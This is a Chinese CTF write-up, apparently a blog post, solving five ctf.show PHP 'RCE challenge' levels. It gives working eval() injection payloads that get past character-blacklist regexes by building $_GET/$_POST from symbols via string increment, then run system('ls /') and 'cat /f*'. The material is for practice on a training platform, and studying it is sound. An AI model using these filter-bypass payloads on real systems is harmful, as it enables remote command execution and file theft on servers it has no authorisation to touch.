1、ctf.show每周大挑战之RCE极限挑战
php的eval()解释:
eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
return 语句会立即终止对字符串的计算。
返回值:除非在代码字符串中调用 return 语句,则返回传给 return 语句的值,否则返回 NULL。如果代码字符串中存在解析错误,则 eval() 函数返回 FALSE。
2、RCE挑战1
如下图所示,POST传参时,参数名为code,后台对 "("、"." 做了替换。
如何才能查找到想要的flag呢?执行远程命令使用 system('ls /'); 或使用反引号 `ls /`;
如上图所示,使用post的code参数传参时,echo `ls /`,显示出系统命令执行的结果,看到有个f1agaaa文件,看似是flag文件,再查看该文件内容 echo `cat /f1agaaa`,这里也可以使用通配符进行内容查看 echo `cat /f*` ,获取到flag,如下图所示:
3、RCE挑战2
如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。
先确认哪些字符可传入。
<?php
for ($i=32;$i<127;$i++){
if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
echo chr($i)." ";
}
}
//post可传入的字符如下:
// ! $ ' ( ) + , . / ; = [ ] _ 从题目可以看出post传参被正则限制的厉害,想办法再同时进行get传参。使用数组绕过,获取数组名的第一个字符A,通过变量自增,组装$_GET[_],以便达到get传参,执行远程命令。
$_=[]._; //$_变量,[]默认表示数组名Array,._ 表示数组名Array拼接上字符'_'
var_dump($_); //输出变量内容为:"Array_"
$__=$_['!'==',']; //里面判断结果为false,即$_[0],即取字符串"Array_"[0] 下标为0的字母,即"A",赋值给变量$__
$__++;$__++;$__++; //$__变量自增,值为B、C、D
$___=++$__; //$___变量赋值为E,$__变量当前值为E
++$__; //$__变量值自增,当前值为F
$___=++$__.$___; //$__变量值自增,当前值为"G",拼接变量$___的值"E"后,再赋值给变量$___,其值为 "GE"
++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__; //$__变量自增,值为H、I、J、K、L、M、N、O、P、Q、R、S
$___=$___.++$__; //$__变量值自增,当前值为T,$___变量的值"GE"拼接"T",再赋值给$___变量,其值为"GET"
$_='_'.$___; //'_'拼接$___变量的值"GET",后再赋值给$_变量,其值为"_GET"
$$_[_]($$_[__]); //即组装出$_GET[_]($_GET[__]),以便get传参,参数名为_和__,如_参数传参为system,__参数传参为ls /,即get传参后拼接出system('ls /')命令,以便eval去执行//post传参
ctf_show=$_=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]);
//get传参
?_=system&__=ls /如下图所示,拼装了一个$_GET[_]($_GET[__]);组合,传递2个参数来达到执行 system('ls /');的目的(尝试只传递一个参数$_GET[_]接收 system("ls /")参数,访问时没什么反应,没想明白为何不行......)。
如上图所示,get参数_传system值,参数__传ls /值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数_传system,参数__传cat /f1agaaa,打开得到falg。
//post传参
ctf_show=$_=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]);
//get传参
?_=system&__=cat /f1agaaa
//或get传参
?_=system&__=cat /f*
4、RCE挑战3
如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。
先确认哪些字符可传入。
for ($i=32;$i<127;$i++){
if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
echo chr($i)." ";
}
}
//post可传入的字符如下
// 0 $ 1 ( ) + , . / ; = [ ] _ 从题目可以看出post传参被正则限制的厉害,想着同时进行get传参,但是限制了post参数长度(<=105)。使非数字绕过,_/_非法运算时返回NAN,通过变量自增,组装$_POST[_],以便达到post传参,执行远程命令。
注意:之前好奇为啥 $d1 = 'ab'.'cd'[0],输出值为"abc",这里涉及到运算优先级问题,'cd'[0]的值为"c",再和前面的'ab'拼接后,即"abc"。
$_=(_/_._)[0]; //$_变量的值为"NAN_"[0]的值,即值为"N"
$_0=++$_; //$_变量自增后,值为"O",且再赋值给变量$_0,且其值为"O"
$_0=++$_.$_0; //$_变量增增后,值为"P",再拼接变量$_0的值"O",再赋值给变量$_0,即值为"PO"
++$_;++$_; //$_变量增增后,值为"Q"、"R"
$_0.=++$_; //变量$_0变量的值为"PO",再拼接$_变量增增后的值"S",再赋值给变量$_0,即值为"POS"
$_0.=++$_; //变量$_0变量的值为"POS",再拼接$_变量增增后的值"T",再赋值给变量$_0,即值为"POST"
$_=_.$_0; //变量$_重新赋值为"_"拼接变量$_0的值"POST",即值为"_POST"
$$_[0]($$_[1]); //替换$_0变量的值"_POST"后,即组装出 $_POST[0]($_POST[1]),以便post传参,参数名为0和1,如0参数传参为system,1参数传参为ls /,即post传参后拼接出system('ls /')命令,以便eval去执行。//post传参
ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]);&0=system&1=ls /如下图所示,拼装了一个$_POST[0]($_POST[1]);组合,传递2个参数来达到执行 system('ls /');的目的(尝试只传递一个参数$_POST[0]接收 system("ls /")参数,访问时没什么反应,没想明白为何不行......)。
如上图所示,post参数0传system值,参数1传ls /值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数0传system,参数1传cat /f*,打开得到falg。
//post传参
ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]);&0=system&1=cat /f*
疑问:post的参数再进行post传参不被正则过滤掉!?
同理,也可以尝试使用该方法查找RCE挑战2的flag。
//post传参
ctf_show=$_=(_/_._)['!'==','];$__=++$_;$__=++$_.$__;++$_;++$_;$__.=++$_;$__.=++$_;$_=_.$__;$$_[_]($$_[__]);&_=system&__=cat /f*
5、RCE挑战4
如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。
先确认哪些字符可传入。
for ($i=32;$i<127;$i++){
if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
echo chr($i)." ";
}
}
//post可传入的字符如下
// $ ( ) + , . / 0 ; = [ ] _ 从题目可以看出post传参被正则限制的厉害,想着同时进行get传参,但是限制了post参数长度(<=85)。使非数字绕过,_/_非法运算时返回NAN,通过变量自增,组装$_POST[_],以便达到post传参,执行远程命令。
注意:$__=$_.$_++(这里涉及3个运算符,= 、 . 、 ++,其中++运算符优先级最高,$_++运算后,$_变量的值为"P",其中 .$_++,表示拼接变量$_自增前的值"O")
$_=(_/_._)[0]; //变量$_的值为"NAN_"[0],即值为"N"
++$_; //变量$_的值自增后,值为"O"
$__=$_.$_++; //变量$_的值自增后,值为"P",再拼接变量$_自增前的值"O",再赋值给变量$__,其值为"PO"
++$_;++$_;++$_; //变量$_的值自增后,值为"Q"、"R"、"S"
$__.=$_++.$_; //变量$_的值为"S",再拼接自增后的值"T",再拼接到变量$__(值为"PO")的后面,最后再赋值给变量$__,即值为"POST"
$_=_.$__; //"_"拼接值为"POST"的变量$__,再赋值给变量$_,即值为"_POST"
$$_[_]($$_[0]); 替换$_变量的值"_POST"后,即组装出 $_POST[_]($_POST[0]),以便post传参,参数名为_和0,如_参数传参为system,0参数传参为ls /,即post传参后拼接出system('ls /')命令,以便eval去执行//post传参
ctf_show=$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);&_=system&0=ls /如下图所示,拼装了一个$_POST[_]($_POST[0]);组合,传递2个参数来达到执行 system('ls /');的目的(尝试只传递一个参数$_POST[_]接收 system("ls /")参数,访问时没什么反应,没想明白为何不行......)。
如上图所示,post参数_传system值,参数0传ls /值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数_传system,参数0传cat /f*,打开得到falg。
//post传参
ctf_show=$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);&_=system&0=cat /f*
6、RCE挑战5
如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。
先确认哪些字符可传入。
for ($i=32;$i<127;$i++){
if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
echo chr($i)." ";
}
}
//post可传入的字符如下
// $ ( ) + , . / ; = [ ] _ 字符长度如何再减少呢?直接将_POST当做post参数的参数名。
$_=(_/_._)[_]; //变量$_的值为"NAN_"[0],即值为"N"
++$_; //变量$_的值自增后,值为"O"
$__=$_.$_++; //变量$_的值自增后,值为"P",再拼接变量$_自增前的值"O",再赋值给变量$__,其值为"PO"
++$_;++$_; //变量$_的值自增后,值为"Q"、"R"
$$_[$_=_.$__.++$_.++$_]($$_[_]); //变量$_的值自增后,值为"S"、"T",并将其拼接到一起"ST",再拼接到$__变量(值为"PO")之后,即值为"POST",
//在再前面拼接"_",即值为"_POST",并赋值给$_变量,再组装成$_POST[]($_POST[_])//post传参
ctf_show=$_=(_/_._)[_];++$_;$__=$_.$_++;++$_;++$_;$$_[$_=_.$__.++$_.++$_]($$_[_]);
2362
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
